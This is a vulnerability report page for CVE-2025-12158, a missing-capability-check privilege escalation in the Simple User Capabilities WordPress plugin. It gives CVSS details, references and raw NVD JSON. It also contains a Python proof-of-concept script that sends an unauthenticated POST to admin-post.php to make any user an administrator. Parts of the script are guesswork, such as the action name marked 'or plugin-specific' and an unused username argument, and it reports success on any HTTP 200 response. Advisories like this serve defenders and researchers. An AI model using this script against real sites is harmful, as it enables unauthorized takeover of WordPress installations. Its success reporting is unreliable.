Security Vulnerability Report
CVE-2025-12158 CVSS 9.8 CRITICAL

CVE-2025-12158

Published: 2025-11-04 05:16:10
Last Modified: 2026-04-15 00:35:42

Description

The Simple User Capabilities plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the suc_submit_capabilities() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to elevate the role of any user account to administrator.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Simple User Capabilities plugin for WordPress <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12158 PoC - Simple User Capabilities Plugin Privilege Escalation
# Target: WordPress site with Simple User Capabilities plugin <= 1.0


def exploit_privilege_escalation(target_url, target_user_id, admin_username):
    """
    Exploit the privilege escalation vulnerability in Simple User Capabilities plugin.
    This allows unauthenticated attackers to grant administrator privileges to any user.

    Args:
        target_url: Base URL of the WordPress site
        target_user_id: ID of the user to escalate (usually 1 for admin)
        admin_username: Username to set for the admin role
    """
    # Endpoint for submitting capabilities (typical WordPress admin-post handler)
    exploit_url = f"{target_url}/wp-admin/admin-post.php"

    # Payload to grant administrator capabilities
    # The plugin allows setting arbitrary capabilities for users
    data = {
        'action': 'submit_capabilities',  # or plugin-specific action name
        'user_id': target_user_id,
        'suc_capabilities': 'administrator',  # or set specific caps
        'role': 'administrator',
        '_wpnonce': ''  # May not be required due to missing capability check
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Targeting user ID: {target_user_id}")
    print(f"[*] Setting role to: administrator")

    try:
        response = requests.post(exploit_url, data=data, timeout=30)
        if response.status_code == 200:
            print("[+] Exploit sent successfully!")
            print("[+] The user should now have administrator privileges.")
            print("[+] Verify by logging in as the target user.")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-12158.py <target_url> <user_id> <admin_username>")
        print("Example: python cve-2025-12158.py http://example.com 1 newadmin")
        sys.exit(1)

    target = sys.argv[1]
    user_id = sys.argv[2]
    admin_user = sys.argv[3]
    exploit_privilege_escalation(target, user_id, admin_user)

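References

https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php
https://wordpress.org/plugins/simple-user-capabilities/
https://www.wordfence.com/threat-intel/vulnerabilities/id/dd75b8ec-1961-4a7a-92e6-1517e638974b?source=cve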

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12158", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:10.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Capabilities plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the suc_submit_capabilities() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to elevate the role of any user account to administrator."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-user-capabilities/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dd75b8ec-1961-4a7a-92e6-1517e638974b?source=cve", "source": "[email protected]"}]}}